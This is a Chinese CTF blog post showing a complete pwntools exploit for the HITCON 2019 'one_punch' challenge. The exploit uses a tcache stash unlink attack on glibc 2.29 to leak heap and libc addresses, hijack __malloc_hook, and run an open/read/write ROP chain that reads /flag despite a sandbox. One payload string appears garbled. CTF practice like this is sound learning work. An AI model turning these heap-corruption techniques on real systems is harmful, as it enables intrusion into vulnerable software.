技巧篇：Tcache stash unlink attack(ubuntu19)

最新推荐文章于 2024-12-13 19:36:11 发布

jsjsj11123

最新推荐文章于 2024-12-13 19:36:11 发布

阅读量269

点赞数

分类专栏： PWN CTF 文章标签： linux python 系统安全安全

本文链接：https://blog.youkuaiyun.com/qq_39948058/article/details/119944497

版权

CTF 同时被 2 个专栏收录

32 篇文章

订阅专栏

PWN

29 篇文章

订阅专栏

前言：今天早上刷题的时候，刷到了一道关于Tcache stash unlink attack的技巧篇，其实简单来说就是tc attack，至于unlink就是为了绕过unlink检测，它还有uaf，开启了沙盒，唯一的突破点是orw，orz。。
还是老样，弄了一下别的师傅的exp，自己懒得写啦。。还得调试orz orz、、
exp：

#coding:utf-8
from pwn import *
 
#r = remote("node4.buuoj.cn", 27347)
r = process("./hitcon_ctf_2019_one_punch")
 
context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
    gdb.attach(r, 
    '''    
    where
    ''')
 
elf = ELF("./hitcon_ctf_2019_one_punch")
libc = ELF('./libc-2.29.so')
one_gadget_19 = [0xe237f, 0xe2383, 0xe2386, 0x106ef8]
 
menu = "> "
def add(index, content):
    r.recvuntil(menu)
    r.sendline('1')
    r.recvuntil("idx: ")
    r.sendline(str(index))
    r.recvuntil("hero name: ")
    r.send(content)
 
def delete(index):
    r.recvuntil(menu)
    r.sendline('4')
    r.recvuntil("idx: ")
    r.sendline(str(index))
 
def edit(index, content):
    r.recvuntil(menu)
    r.sendline('2')
    r.recvuntil("idx: ")
    r.sendline(str(index))
    r.recvuntil("hero name: ")
    r.send(content)
 
def show(index):
    r.recvuntil(menu)
    r.sendline('3')
    r.recvuntil("idx: ")
    r.sendline(str(index))
 
def back_door(content):
    r.recvuntil(menu)
    r.sendline('50056\x00\x00')
    sleep(1)
    r.send(content)
 
# fill full tcache size 0x410
for i in range(7):
    add(0, 'a'*0x400)
    delete(0)
# fill 6 in tcache size 0x100
for i in range(6):
    add(1,'b'*0xf0)
    delete(1)
show(0)
r.recvuntil("hero name: ")
last_chunk_addr = u64(r.recvuntil('\n').strip().ljust(8, '\x00'))
heap_addr = last_chunk_addr - 0x16B0
success("heap_base:"+hex(heap_addr))
 
add(0, 'a'*0x400)  #calloc
add(1, 'b'*0x300)
delete(0)
show(0)
r.recvuntil("hero name: ")
malloc_hook = u64(r.recvuntil('\n').strip().ljust(8, '\x00')) - 0x60 - 0x10
libc.address = malloc_hook - libc.sym['__malloc_hook']
syscall = libc.address + 0x000000000010D022
add_rsp = libc.address + 0x000000000008cfd6
leave = libc.address + 0x0000000000058373
pop_rdi_ret = libc.address + 0x0000000000026542
pop_rsi_ret = libc.address + 0x0000000000026f9e
pop_rdx_ret = libc.address + 0x000000000012bda6
pop_rax_ret = libc.address + 0x0000000000047cf8
success("libc:"+hex(libc.address))
 
add(1, 'b'*0x300)
add(1, 'b'*0x300)#smallbin1
add(0, 'a'*0x400)
add(1, 'b'*0x300)
delete(0)
add(1, 'b'*0x300)
add(1, 'b'*0x300)#smallbin2
 
payload = '\x0x56544280d92000'*0x300+p64(0)+p64(0x101)+p64(heap_addr+0x27D0)+p64(heap_addr+0x30-5-0x10)
edit(0, payload)
 
add(1, '/flag'+'\x00'*0x100)
for i in range(7):
    add(1, 'b'*0x217)
    delete(1)
edit(1, p64(malloc_hook))
add(1, 'b'*0xf0)
back_door(p64(malloc_hook))
back_door(p64(add_rsp))
 
file_name_addr = heap_addr + 0x3930
flag_addr = heap_addr + 0x3940
ROP_chain = p64(pop_rdi_ret)
ROP_chain += p64(file_name_addr)
ROP_chain += p64(pop_rsi_ret)
ROP_chain += p64(0)
ROP_chain += p64(pop_rax_ret)
ROP_chain += p64(2)
ROP_chain += p64(syscall)
#ROP_chain += p64(libc.symbols['open'])
ROP_chain += p64(pop_rdi_ret)
ROP_chain += p64(3)
ROP_chain += p64(pop_rsi_ret)
ROP_chain += p64(flag_addr)
ROP_chain += p64(pop_rdx_ret)
ROP_chain += p64(0x40)
ROP_chain += p64(libc.symbols['read'])
ROP_chain += p64(pop_rdi_ret)
ROP_chain += p64(1)
ROP_chain += p64(pop_rsi_ret)
ROP_chain += p64(flag_addr)
ROP_chain += p64(pop_rdx_ret)
ROP_chain += p64(0x40)
ROP_chain += p64(libc.symbols['write'])
 
add(1, ROP_chain)
r.interactive()